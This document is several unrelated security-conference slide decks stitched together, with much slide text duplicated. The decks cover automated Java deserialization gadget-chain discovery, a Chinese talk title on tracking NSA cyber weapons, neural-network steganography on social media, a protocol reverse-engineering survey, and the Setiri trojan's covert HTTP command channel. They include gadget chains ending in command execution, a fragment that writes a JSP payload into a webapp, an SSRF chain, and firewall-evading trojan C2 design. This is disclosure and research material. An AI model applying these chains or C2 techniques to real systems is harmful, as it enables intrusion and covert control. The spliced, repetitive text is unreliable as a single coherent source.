1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Assumption #3: Any method implementation can be jumped to (as long as its class is “serializable”) ● AbstractTableModel...hashCode() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Assumption #3: Any method implementation can be jumped to (as long as its class is “serializable”) ● AbstractTableModel...hashCode() @ 0 ● FnCompose.invoke() @ 0 Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Assumption #3: Any method implementation can be jumped to (as long as its class is “serializable”) ● AbstractTableModel...hashCode() @ 0 ● FnCompose.invoke() @ 0 ● FnEval @ 1 Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Assumption #3: Any method implementation can be jumped to (as long as its class is “serializable”) ● AbstractTableModel...hashCode() @ 0 ● FnCompose.invoke() @ 0 ● FnEval @ 1 ● Runtime.exec() @ 1 Automated Discovery of Deserialization Gadget Chains Ian Haken Step 5: BFS on Call Graph for Chains Sources ● AbstractTableModel$ff19274a.hashCode() @ 0 Call Graph AbstractTableModel$ff19274a.hashCode() ● 0 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 FnCompose.invoke() ● 1 -> IFn.invoke() @ 1 ● 0 -> IFn.invoke() @ 0 ● 0 -> IFn.invoke() @ 1 FnEval.invoke() ● 1 -> Runtime.exec() @ 1 Chain Assumption #3: Any method implementation can be jumped to (as long as its class is “serializable”) ● AbstractTableModel...hashCode() @ 0 ● FnCompose.invoke() @ 0 ● FnEval @ 1 ● Runtime.exec() @ 1 Limitation #2: Chain discovery relies on a list of known “interesting” sinks Automated Discovery of Deserialization Gadget Chains Ian Haken Gadget Inspector supports some customization on the analysis ● What is considered “serializable”? ○ For JRE deserialization, anything implementing java.lang.Serializable ○ For XStream, it depends on the convertors that are enabled ■ And when using custom convertors, it gets even more subtle ○ For Jackson, any class with a no-arg constructor ● What are the deserialization sources (i.e. magic methods)? ○ For Jackson we only start in constructors ● What method implementations should we consider? ○ For JRE deserialization, all implementations in a serializable class ○ For Jackson, depends on annotations and configuration Deserialization Library Flexibility OSS Library Results Automated Discovery of Deserialization Gadget Chains Ian Haken Ran Gadget Inspector against the 100 most popular java libraries (according to mvnrepository.com and javalibs.com) looking for exploits against standard Java deserialization ● It did rediscover several known gadget chains ● Not that many libraries actually have classes implementing java.io.Serializable... ○ But there were some interesting new findings! ● Had a handful of false positives but not as many as you’d expect ○ Mostly because reflection is hard to reason about Results: OSS Library Scans Automated Discovery of Deserialization Gadget Chains Ian Haken commons-collections » commons-collections 38th most popular maven dependency 1. ....corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl invoke(Object, Method, Object[]) (0) 2. org.apache.commons.collections.map.LazyMap.get(Object) (0) 3. org.apache.commons.collections.functors.InvokerTransformer transform(Object) (0) 4. java.lang.reflect.Method.invoke(Object, Object[]) (0) Results: Old Gadget Chains https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java Automated Discovery of Deserialization Gadget Chains Ian Haken New Gadget Chains: Clojure org.clojure » clojure 6th most popular maven dependency 1. clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a.hashCode() (0) 2. clojure.main$load_script.invoke(Object) (1) 3. clojure.main$load_script.invokeStatic(Object) (0) 4. clojure.lang.Compiler.loadFile(String) (0) 5. FileInputStream.<init>(String) (1) Tweaked this result to invoke clojure.main$eval_opt instead of clojure.main$load_script to invoke arbitrary code. Reported to clojure-dev July 2017, affecting 1.8.0 and all earlier versions. Serialization of AbstractTableModel$ff19274a disabled in 1.9.0 release (Dec, 2017). https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Clojure.java Automated Discovery of Deserialization Gadget Chains Ian Haken New Gadget Chains: Scala org.scala-lang » scala-library 3rd most popular maven dependency 1. scala.math.Ordering$$anon$5.compare(Object, Object) (0) 2. scala.PartialFunction$OrElse.apply(Object) (0) 3. scala.sys.process.processInternal$$anonfun$onIOInterrupt$1 applyOrElse(Object, scala.Function1) (0) 4. scala.sys.process.ProcessBuilderImpl$FileOutput$$anonfun$$lessinit$greater$3.apply() (0) 5. java.io.FileOutputStream.<init>(File, boolean) (1) Allows you to write/overwrite a file with 0 bytes. Possible DoS? Zero-out a blacklist? https://github.com/JackOfMostTrades/ysoserial/blob/master/src/main/java/ysoserial/payloads/Scala.java Automated Discovery of Deserialization Gadget Chains Ian Haken New Gadget Chains: Scala 1. scala.math.Ordering$$anon$5.compare(Object, Object) (0) 2. scala.PartialFunction$OrElse.apply(Object) (0) 3. scala.sys.process.processInternal$$anonfun$onIOInterrupt$1 applyOrElse(Object, scala.Function1) (0) 4. scala.sys.process.ProcessBuilderImpl$URLInput$$anonfun$ $lessinit$greater$1.apply() (0) 5. java.net.URL.openStream() (0) SSRF: Causes application to perform a GET on an arbitrary URL. https://github.com/JackOfMostTrades/ysoserial/blob/master/src/main/java/ysoserial/payloads/Scala.java Automated Discovery of Deserialization Gadget Chains Ian Haken New Gadget Chains: Clojure2 In rerunning Gadget Inspector on the latest release (1.10.0-alpha4) in preparation for this presentation, a different entry point was discovered: 1. clojure.lang.ASeq.hashCode() (0) 2. clojure.lang.Iterate.first() (0) 3. clojure.main$load_script.invoke(Object) (1) 4. clojure.main$load_script.invokeStatic(Object) (0) 5. clojure.lang.Compiler.loadFile(String) (0) 6. FileInputStream.<init>(String) (1) Confirmed the same tweak to clojure.main$eval_opt works for arbitrary code execution. Affects all releases since 1.8.0. https://github.com/JackOfMostTrades/ysoserial/blob/master/src/main/java/ysoserial/payloads/Clojure2.java Netflix App Results Automated Discovery of Deserialization Gadget Chains Ian Haken Results: Netflix Internal Webapp 1 Potentially dangerous use of Jackson deserialization: public void doSomething(String body, String queryParam) { Object requestObject = objectMapper.readValue( body, Class.forName(queryParam)); ● Can only deserialize classes with no-arg constructors ● The only entry points are no-arg constructors But still, the app has ~200MB classpath. So maybe there’s something there... Automated Discovery of Deserialization Gadget Chains Ian Haken Results: Netflix Internal Webapp 1 Potentially dangerous use of Jackson deserialization: public void doSomething(String body, String queryParam) { Object requestObject = objectMapper.readValue( body, Class.forName(queryParam)); ● Can only deserialize classes with no-arg constructors ● The only entry points are no-arg constructors But still, the app has ~200MB classpath. So maybe there’s something there... Result: A few false positives and nothing very interesting. Take-away: Remediation is a low priority Automated Discovery of Deserialization Gadget Chains Ian Haken Results: Netflix Internal Webapp 2 Used a non-standard deserialization library, subject to some unique constraints ● Invokes readResolve() but not readObject() ● Serialized objects do not need to implement Serializable ● Member fields of serialized objects cannot have a $ in the name. ○ Non-static inner classes always have an implicit $outer member name. ● No serialization support for arrays or generic maps ● No null member values Automated Discovery of Deserialization Gadget Chains Ian Haken 1. com.thoughtworks.xstream.mapper.AbstractAttributeAliasingMapper.readResolve() (0) 2. org.apache.commons.configuration.ConfigurationMap$ConfigurationSet.iterator() (0) 3. ...configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>() (0) 4. org.apache.commons.configuration.CompositeConfiguration.getKeys() (0) 5. clojure.lang.APersistentMap$KeySeq.iterator() (0) 6. com.netflix.internal.utils.collections.IteratorWrapper$CallableWrapper.iterator() (0) 7. java.util.concurrent.Executors$RunnableAdapter.call() (0) 8. org.apache.commons.exec.StreamPumper.run() (0) 9. org.eclipse.core.internal.localstore.SafeFileOutputStream.close() (0) 10. org.eclipse.core.internal.localstore.SafeFileOutputStream.commit() (0) 11. org.eclipse.core.internal.localstore.SafeFileOutputStream.copy(File, File) (2) 12. java.io.FileOutputStream.<init>(File) (1) Results: Netflix Internal Webapp 2 Automated Discovery of Deserialization Gadget Chains Ian Haken Results: Netflix Internal Webapp 2 1. com.thoughtworks.xstream.mapper.AbstractAttributeAliasingMapper.readResolve() (0) 2. org.apache.commons.configuration.ConfigurationMap$ConfigurationSet.iterator() (0) 3. ...configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>() (0) 4. org.apache.commons.configuration.CompositeConfiguration.getKeys() (0) 5. clojure.lang.APersistentMap$KeySeq.iterator() (0) 6. com.netflix.internal.utils.collections.IteratorWrapper$CallableWrapper.iterator() (0) 7. java.util.concurrent.Executors$RunnableAdapter.call() (0) 8. org.apache.commons.exec.StreamPumper.run() (0) 9. org.eclipse.core.internal.localstore.SafeFileOutputStream.close() (0) 10. org.eclipse.core.internal.localstore.SafeFileOutputStream.commit() (0) 11. org.eclipse.core.internal.localstore.SafeFileOutputStream.copy(File, File) (2) 12. java.io.FileOutputStream.<init>(File) (1) com.thoughtworks.xstream:xstream commons-configuration:commons-configuration org.clojure:clojure netflix:netflix-utils JRE org.apache.commons:commons-exec org.aspectj:aspectjtools Automated Discovery of Deserialization Gadget Chains Ian Haken 1. com.thoughtworks.xstream.mapper.AbstractAttributeAliasingMapper.readResolve() (0) 2. org.apache.commons.configuration.ConfigurationMap$ConfigurationSet.iterator() (0) 3. ...configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>() (0) 4. org.apache.commons.configuration.CompositeConfiguration.getKeys() (0) 5. clojure.lang.APersistentMap$KeySeq.iterator() (0) 6. com.netflix.internal.utils.collections.IteratorWrapper$CallableWrapper.iterator() (0) 7. java.util.concurrent.Executors$RunnableAdapter.call() (0) 8. org.apache.commons.exec.StreamPumper.run() (0) 9. org.eclipse.core.internal.localstore.SafeFileOutputStream.close() (0) 10. org.eclipse.core.internal.localstore.SafeFileOutputStream.commit() (0) 11. org.eclipse.core.internal.localstore.SafeFileOutputStream.copy(File, File) (2) 12. java.io.FileOutputStream.<init>(File) (1) Results: Netflix Internal Webapp 2 Automated Discovery of Deserialization Gadget Chains Ian Haken 1. com.thoughtworks.xstream.mapper.AbstractAttributeAliasingMapper.readResolve() (0) 2. org.apache.commons.configuration.ConfigurationMap$ConfigurationSet.iterator() (0) 3. ...configuration.ConfigurationMap$ConfigurationSet$ConfigurationSetIterator.<init>() (0) 4. org.apache.commons.configuration.CompositeConfiguration.getKeys() (0) 5. clojure.lang.APersistentMap$KeySeq.iterator() (0) 6. com.netflix.internal.utils.collections.IteratorWrapper$CallableWrapper.iterator() (0) 7. java.util.concurrent.Executors$RunnableAdapter.call() (0) 8. org.apache.commons.exec.StreamPumper.run() (0) ○ is = java.io.StringBufferInputStream ■ buffer = <% String cmd="calc.exe"; ... %> ○ os = org.eclipse.core.internal.localstore.SafeChunkyOutputStream ■ isOpen = false ■ filePath = /webappdir/foo.jsp Results: Netflix Internal Webapp 2 Automated Discovery of Deserialization Gadget Chains Ian Haken ● Reflection ○ Most reflection calls are being treated as interesting, leading to FPs ■ E.g. you can control the class but not the method name, or vice-versa ○ Blind spots for call graph enumeration ■ foo.getClass().getMethod(“bar”).invoke(...) ● Assumptions ○ Even minor improvements would allow Gadget Inspector to make better decisions around condition satisfiability or virtual method call resolution, leading to fewer FPs. ● Limitations ○ Entry points are enumerated using “known tricks.” Original research can still help us find lots of other clever ways to construct gadget chains. ○ Sinks with “interesting behavior” are hard-coded. Lots of room to discover and add sinks. Room for Improvement Automated Discovery of Deserialization Gadget Chains Ian Haken @ianhaken https://github.com/JackOfMostTrades ● Automatic discovery for gadget chains is new territory ○ Gadget Inspector is a functional prototype; room for lots of improvement! ○ Gadget Inspector written for Java but techniques apply to other languages ● Gadget Inspector is open source ○ Fork it, submit PRs, or just check it out for more details about how it works ○ https://github.com/JackOfMostTrades/gadgetinspector ● Deserialization vulnerabilities aren’t going away yet ○ Exploits can and will be more complex as time goes on ○ Better tools will help us understand the risk of vulnerabilities Final Thoughts
ISC 2019 第七届互联网安全大会 郑文彬 360集团首席安全技术官、伏尔甘团队创始人 追踪NSA网络武器的那些年 扫码添加小鹅助理,与数万科技圈人士 分享重量级活动PPT、干货培训课程、高端会议免费 门票 小鹅助理 扫码添加小鹅助理,与数万科技圈人士 分享重量级活动PPT、干货培训课程、高端会议免费门票 小鹅助理 谢谢!
A Picture is Worth a Thousand Words, Literally Deep Neural Networks for Social Stego Philip Tully | Mike Raggo 1 DC25: Community, Discovery and the Unintended Uses of Technology 2 2600: The Hacker Quarterly 3 Summer 1992 Summer 2017 25 years #whoami 4 Philip Tully @phtully Principal Data Scientist at ZeroFOX PhD (KTH & University of Edinburgh) Machine Learning and Neural Nets Mike Raggo @datahiding CSO @802 Secure, 17 yrs Stego Research StegSpy DC12, Author “Data Hiding” NSA National Cryptologic Museum A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego The Evolution of Steganography 5 DIY Social Steganography Deep Neural Networks for Social Stego Data-Driven Red and Blue Teaming Wrap Up A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego The Evolution of Steganography 6 Covert Communication 7 “. . . any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy.” Source: U.S. Department of Defense. Trusted Computer System Evaluation “The Orange Book”. Publication DoD 5200.28-STD. Washington: GPO 1985 WetStone Labs Collected Steganography Programs Since January 1999 Includes versions 8 Tools are simple, designed to exploit sense weaknesses Many copycats are born, with some new features, greater focus on JPEG embedding Methods become more resilient to statistical attacks Multimedia begins to evolve into a viable method New versions emerge of existing Alg. Steganographic file systems begin to emerge VOIP, RTP and UDP techniques emerge along with decoys to complicate detection and recovery Evolution of Methods Evolution of Stego in the Internet Era 9 ▪Stego Apps Decoy Techniques (OpenPuff) ▪Stealth Alternate Data Streams (NT) ▪Weaponized CnC - Operation Shady RAT (McAfee) ▪Prootocols - VOIP, RTP, UDP => WiFi StegoStuffing, Bluetooth (Hosmer/Raggo - Wall of Sheep/Skytalks DC23 & 24) ▪MP3 ID3 Metadata exploitation - Hosmer/Raggo Skytalks DC24 ▪SmartWatch SWATtackhide.py Tizen SDK - Mike Raggo - DEF CON 24 Demo Labs and Wall of Sheep Types of Steganography 10 ▪ Text/Linguistic Stego - using Natural Language ▪ Image ▪ Spatial (e.g. LSB) ▪ Frequency (DCT/DWT) ▪ Metadata (varies by file type and versions) - JPEG EXIF vs. JFIF ▪ Audio ▪ Video ▪ Protocols ▪ Use of crypto with stego ▪ Vigenere, base64, XOR, etc. A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego 11 DIY Social Steganography 12 100+ hours of video uploaded per minute. 4.75 billion pieces of content shared per day. 500+ million tweets per day. 80+ million images uploaded per day. 5 billion +1’s per day. Signals in the Social Noise Social Network Image Proliferation 13 ▪Image-based social networks have the fastest growing user bases ▪Image-based social networks enjoy the highest daily time spent by users ▪“Photos or Images” is the content category most frequently share by users ▪Social posts containing images produce 650% higher engagement than text alone Social Stego in the Wild 14 White Hat: Instegogram Black Hat: HAMMERTOSS Social Network Photo Targets 15 ▪Profile Image ▪Background Image ▪Posted Image(s) ▪Photo albums ▪DM images Carrier Image File Types 16 ▪ Image quality properties: ▪ Lossy v. Lossless Raster Compression ▪ DPI/PPI ▪ Common file formats: ▪ JPEG (Lossy) ▪ PNG (Lossless) ▪ TIFF (Lossless) ▪ GIF (Lossy) ▪ BMP (Lossy) Trial and Error - Attempted Methods 17 ▪Metadata fields (varies by image types JPEG EXIF vs. JFIF, etc.) ▪LSB - Least Significant Bit ▪Insertion ▪Append after EOF marker ▪Pre and Post Upload ▪Linguistic Steganography DataGenetics High-Level Testing Workflow 18 Social Network Data Hiding Survivability 19 A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego 20 Deep Neural Networks for Social Stego Secretbook by Owen Campbell-Moore 21 ▪ Open-source Social Stego tool ▪ Chrome Extension (2013) ▪ Reverse engineered Facebook’s lossy compression algorithm ▪ Allowed for payloads of up to 140 characters in length Jamming Techniques 22 ▪ Server-side image upload restrictions and alterations ▪ Also legal concerns ▪ Crime investigations ▪ Trademark infringement ▪ Common Image upload Alterations: ▪ Recompression ▪ Metadata stripping ▪ Filetype conversion ▪ Resizing 23 Bulk Image Uploads/Downloads ▪Data Acquisition made easy ■ Permissive APIs for content creation ■ More content=more engagement=profit ▪Off-the-shelf photo aggregators ■ Facebook albums ■ Pinterest boards ■ Flickr sets ■ Google+ Collections ▪Or we can do it the ‘hard way’ ■ for photo in album{ upload(photo); sleep(randInt); } 08 02 22 97 38 15 00 75 04 05 07 78 52 49 49 99 40 17 81 18 57 60 87 17 40 98 81 49 31 73 55 79 14 29 93 71 40 67 53 52 70 95 23 04 60 11 42 69 24 65 56 54 22 31 16 71 51 67 63 89 41 92 36 54 22 24 47 32 60 99 03 45 02 44 75 33 53 78 32 98 01 20 64 23 67 10 26 38 40 67 59 67 26 20 68 02 62 12 20 95 63 94 39 63 24 What humans see What computers see Auto-Generating Data ▪Select 50k ImageNet samples ▪Automate uploads and downloads ▪=100k pre-uploaded and downloaded images ▪Compare pixels between phases ▪Can comparison/location be automated? ▪But Neural Nets don’t scale to Images ■ width * height * 3 channels = unmanageable # weights ■ encode these properties into the architecture 25 Convolutional Neural Networks ▪Proven great for Computer Vision Tasks: ■ Object classification, Facial recognition ▪Pose as a Regression Task ■ Locate optimally embeddable pixels ■ Akin to bounding boxes for object detection ▪ConvNet hyperparameters ■ 7 stacked layers (5 convolutional, 2 fully connected) ■ Fed thru ReLUs and smooth L1 loss regression layer ▪Model spec ■ Keras on top of TensorFlow (Python) ■ Google GPU (8 vCPU Nvidia Tesla) Illustration: Andrej Karpathy CNNs: Szegedy, Toshev & Erhan, 2013 26 Prototype Evaluation ▪More robust, less detectable transmission ▪Learned locations correspond to locations that are more complex and “busier” ▪Minimal Visual Dissimilarity ■ Distortion: peak signal-to-noise ratio ■ Capacity: byte Survivability ▪Recovery rates worsen as hidden data size decreases A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego 27 Data-Driven Red and Blue Teaming InfoSec ML Historically Prioritizes Defense TIME 28 Data-Driven Social Engineering 29 Level of Effort Success Rate SNAP_R Fully Automated 30-35% Accuracy Spear Phishing Highly Manual 45% Accuracy Phishing Mostly Automated 5-14% Accuracy Low High Low High ▪Black Hat/DEF CON 2016 ▪Why Twitter? ■ Bot-friendly API ■ Colloquial syntax ■ Shortened URLs ■ Abundant personal data ▪Machine grammar suffices ▪10k+ DoD accts targeted Red Team ML Rising 30 ▪Growing number of examples: ■ Micro-targeted social engineering ■ Password cracking ■ Captcha subversion ■ AV evasion ■ Steganography ▪Offensive ML easier than defensive ML! ■ “Labeling Bottleneck” - unsupervised ▪Success matters more for blue than red team ▪Retreating barriers to entry ■ More open-source initiatives ■ Cheapening access to powerful machines (eg. GPUs) Not to worry, though... 31 ▪Offensive ML is a positive development ▪It will “keep us honest” ▪Emerging defenses keep pace: ■ Semi-supervised learning ■ Adversarial learning ■ Transfer learning ■ Self-supervised reinforcement learning ▪Ultimately improve security ▪Faster this is realized, the better A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego 32 Wrap Up Next Steps 33 ▪ More social networks ▪ More stego (frequency domain) ▪ Video files (MP4, MOV, etc.) ▪ Soon-to-be most popular ▪ News Feed promoted ▪ Audio files (MP3) ▪ Create custom MP3s w/ GarageBand ▪ MP3s embedded JPEG insertion ▪ ID3 Headers DC 24 SkyTalks Hosmer/Raggo www.python-forensics.org Mitigations 34 ▪ More sophisticated and dynamic jamming techniques ▪ Anomaly/Histogram analysis - increased quantization ▪ Impermanence: delete by default ▪ Ephemeral images a la Snapchat ▪ But generally, steganalysis is hard! ▪ Variance in social networks add exponential complexity to identifying existence of stego and recovery of evidence - “know thy enemy” Summary and Questions? 35 ▪ Social networks and image hosting services can be orthogonally used to transmit data covertly ▪ Steganography can be automated despite distorting image upload side effects ▪ Offensive AI is cheaper and easier to implement than defensive AI ▪ Code released soon, PRs welcome Philip Tully @phtully Mike Raggo @datahiding
Network Protocol Reverse Engineering Literature Survey for “Eavesdropping on the Machines” Presented 2016-08-05 at DEF CON 24 by Tim Estell and Katea Murray Prior DEF CON Talks DC22 - Jesus Molina presented “Learn how to control every room at a luxury hotel remotely: the dangers of insecure home automation deployment”. In-depth look at a specific protocol, but no repeatable process for NPRE. DC 22 – Geoff McDonal presented “Meddle: Framework for Piggy-back Fuzzing and Tool Development”, arguing “Why bother spending time understanding the protocol just to try break it?”. His fuzzing tool sidesteps NPRE? DC 22 – Dustin Hoffman and Thomas Kinsey presented “What the Watchers See: Eavesdropping on Municipal Mesh Cameras for Giggles (or Pure Evil)” where they decoded an undocumented protocol (i.e., NPRE). But they didn’t focus on a repeatable process for you to reverse your own protocol. DC 23 – Peter Shipely and Ryan Gooler presented “Insteon' False Security And Deceptive Documentation” where they asserted the published protocol documentation from Insteon is incorrect and deceptive. But no generalized process for NPRE. Summary of Research Published research for Network Protocol Reverse Engineering (NPRE) has addressed many challenges. The Protocol Informatics Project (PI Project) [Beddoe 2004] accomplished PRE using network traces and two string alignment algorithms, Needleman-Wunsch and Smith-Waterman. A Semi-automated approach [Gopalratnam 2006] uses packets from the protocol of interest and at least one packet with the fields labeled. Gaussian models are used to cluster the field and provide information to the user about field values. They note their algorithm does not scale well with the number of fields being analyzed or the size of the messages. Some researchers state that the limitation of network traces is a lack of protocol semantics as network traces only contain syntactic information and cannot provide the full protocol grammar [Caballero 2007]. These researchers rely on dynamic binary analysis and data tainting ([Caballero 2007] [Lin 2008] and [Caballero 2009]) or a combination of network traces and access to the binary [Cui 2008]. However, it has been demonstrated [Trifilo 2009] that discovery of the binary features in a protocol and a state machine builder can determine the states and proper transitions from network packet captures alone. Finally, the research has been reduced to practice for TCP/IP networks through Netzob [Netzob], an open source tool with: vocabulary inference from network traces; semi-autonomous grammar inference; and dynamic analysis through protocol simulation. Several researchers ([Lin 2008] [Wondracek 2008] and [Trifilo 2009]) implement incremental clustering using tree structures. However each of them requires data normalization or other grooming techniques which are not applicable to all environments. Researchers ([Wondracek 2008] and [Caballero 2009]) have also augmented protocol specifications with semantic information by adding specific running statistical information and a confidence metric. The approaches do not address resource constrained environments. One potential approach uses Balanced Iterative Reducing and Clustering using Hierarchies (BIRCH) [Zhang 1996] as a hierarchical clustering method because it will: incrementally and dynamically cluster; execute within given memory and time constraints; classify on a single scan of the data; and handle data with errors or noise. This would require further optimization to prioritize high-level completeness over accuracy as a method of initially capturing all of the message types, then reset the in-memory data structure to prioritize accuracy of individual message types. Research should begin with a survey of message protocol features to develop a Domain Specific Language (DSL) suitable for compact representation of features. The DSL should extend existing work done by the Open Grid Forum’s Data Format Description Language (DFDL) [OGF-DFDL] and by other Data Description Languages (DDL) such as XML Schema [XML Schema]. These sources use human readable text formatted in an XML manner, making them unsuitable for machine processing or automated reasoning. The DSL may extend Abstract Syntax Notation One (ASN.1) encoding rules, which provides for more efficient serialization than the text-based XML format. Bibliography [Beddoe 2004] Beddoe, M. (2004 August). The Protocol Informatics Project (PI Project). http://www.4tphi.net/~awalters/PI/PI.html. [Gopalratnam 2006] Gopalratnam, K., Basu, S., Dunagan, J., & Wang, H. (2006, June). Automatically extracting fields from unknown network protocols. In First Workshop on Tackling Computer Systems Problems with Machine Learning Techniques (SysML06). [Cui 2007] Cui, W., Kennan, J., & Wnag, H. J. (2007, August). Discoverer: Automatic protocol reverse engineering from network traces. In Proceeding of 16th USENIX Security Symposium on USENIX Security Symposium (pp. 1-14). [Cui 2008] Cui, W., Peinado, M., Chen, K., Wang, H. J., & Irun-Briz, L. (2008). Tupni: automatic reverse engineering of inputs formats. In Proceedings of the 15th ACM conference on Computer and Communications Security (CCS ’08). ACM. [Lin 2008] Lin, Z., Jian, X., Xu, D., & Zhang, X. (2008). Automatic Protocol Format Reverse Engineering through Context-Aware Monitored Execution. In 15th Symposium on Network and Distributed System Security (NDSS), 2008. Internet Society. [Wondracek 2008] Wondracek, G., Comparetti, P. M., Kruegel, C., & Kirda, E. (2008). Automatic Network Protocol Analysis. In 15th Symposium on Network and Distributed System Security (NDSS), 2008. Internet Society. [Caballero 2007] Caballero, J., Yin, H., Liang, Z., & Song, D. (2007, October). Polyglot: Automatic extraction of protocol message format using dynamic binary analysis. In Proceedings of the 14th ACM Conference on Computer and Communications Security (pp. 317-329). ACM. [Caballero 2009] Caballero, J., Poosankam, P., Kreibich, C., & Song, D. (2009). Dispatcher: enabling active botnet infiltration using automatic protocol reverse-engineering. In Proceeding of the 16th ACM Conference on Computer and Communications Security (CCS ’09). ACM. [Trifilo 2009] Trifilo, A., Burschka, S., Biersack, E. (2009 July). Traffic to protocol reverse engineering. In Proceedings of the Computational Intelligence for Security and Defense Applications, 2009 (CISDA 2009). IEEE [Zhang 1996] Zhang, T., Ramakrishnan R., & Livny, M. (1996, June). “BIRCH: An Efficient Data Clustering Method for Very Large Databases, 1996. In ACM SIGMOD Record (Vol. 25, No. 2, pp 103-114). ACM. [Netzob] www.netzob.org. An open source tool for reverse engineering, traffic generation and fuzzing of communication protocols. [OGF-DFDL] http://www.ogf.org/dfdl/. Data Format Description Language (DFDL) is a language for describing text and binary data formats. A DFDL description allows any text or binary data to be read from its native format and to be presented as an instance of an information set. DFDL also allows data to be taken from an instance of an information set and written out to its native format. DFDL achieves this by leveraging W3C XML Schema Definition Language (XSDL) 1.0. It is therefore very easy to use DFDL to convert text and binary data to a corresponding XML document. (Text taken from their web site in January 2014) [XML Schema] http://www.w3.org/standards/xml/schema. An XML Schema is a language for expressing constraints about XML documents. There are several different schema languages in widespread use, but the main ones are Document Type Definitions (DTDs), Relax-NG, Schematron and W3C XSD (XML Schema Definitions). From this page you can find out more about DTDs and W3C XSD, since those are the primary schema languages defined at W3C. (Text taken from their web site in January 2014)
Setiri: Advances in Trojan Technology Roelof Temmingh & Haroon Meer Defcon 10 Las Vegas 2002 Schedule Introduction Why Trojans? Brief History of Trojans & Covert Channels The Hybrid model Setiri: Advances in Trojan Technology Demonstration Taking it further Possible fixes Introduction SensePost The speakers Objective of the presentation Why Trojans? Profile of Trojan users Real criminals… …don’t write buffer overflows The weirdness of the industry Examples Brief History of Trojans & Covert Tunnels Trojans From Quick Thinking Greeks … to Quick Thinking Geeks Tunnels Covert Channels Trojans (Valid IP – No Filters) ‚get real..‛ Trojans (Valid IP – Stateless Filter) Dial Home Trojans Random Ports / Open Ports / High Ports [cDc] ACK Tunneling [Arne Vidstrom] Trojans (Stateful Filters) Orifice - http://bo2k.sourceforge.net Gbot Rattler Brief History of Trojans & Covert Tunnels Trojans From Quick Thinking Greeks … to Quick Thinking Geeks Tunnels Covert Channels Tunnels & Covert Channels 1985 – TSC Definition‛Covert Channels‛ 1996 – Phrack Magazine – LOKI 1998 – RWWWShell – THC 1999 - HTTPTUNNEL – GNU 2000 - FireThru - Firethru Conventional Trojans & how they fail Stateful firewall & IDS Direct model Direct model with network tricks ICMP tunneling ACK tunneling Properly configured stateful firewall IRC agents + Authentication proxy HTTP tunnel ++ Personal firewall & Advanced Proxy HTTP tunnel with Authentication +++ Hybrid model: “GatSlag” Combination between covert Tunnel and Trojan Defenses mechanisms today: Packet filters (stateful) / NAT Authentication Proxies Intrusion detection systems Personal firewalls Content/protocol checking Biometrics/Token Pads/One time passwords Encryption A typical network How GatSlag worked Reverse connection HTTP covert tunnel Microsoft Internet Explorer as transport Controls IE via OLE Encapsulate in IE, not HTTP Receive commands in title of web page Receive encoded data as plain text in body of web page Send data with POST request Send alive signals with GET request Why GatSlag worked Integration of client with MS Proxy NTLM authentication SSL capable Registry changes Personal firewalls Just another browser Platform independent IE on every desktop Specify Controller Via public web page – the MASTER site Problems with Gatslag The Controller’s IP can be obtained ! Handling of multiple instances GUI support Controller needed to be online Batch commands Command history Multiple controllers Upload facility not efficient Platform support Stability Session level tunneling Setiri: Advances in Trojan Technology Design notes: Web site contains instructions CGIs to create new instruction Controller’s interface: –EXEC (DOS commands, various) –TX (File upload) –RX (File download) Directory structure – each instance Trojan ‚surfs‛ to web site – just a normal user would Setiri: Advances in Trojan Technology II Anonymity Problems with normal proxies Already using a proxy Proxy logs ‚Cleaners‛ provide anonymity ‚In browser proxy‛ – Anonymizer Trojan -> Cleaner: SSL Cleaner -> Controller: SSL Challenges: Browser history Temporary files Why defenses fail Firewalls (stateful/NAT) Configured to allow user or proxy out Content level & IDS Looks like valid HTTP requests & replies Files downloaded as text in web pages No data or ports to lock on to SSL provides encryption Personal firewalls IE valid application Configured to allow browsing Authentication proxies User surf the web Demonstration Solving the dilemma Delivery White listing User education AV, personal firewalls Should you allow everyone to surf the ‘net? Conclusion Awareness Our motivation
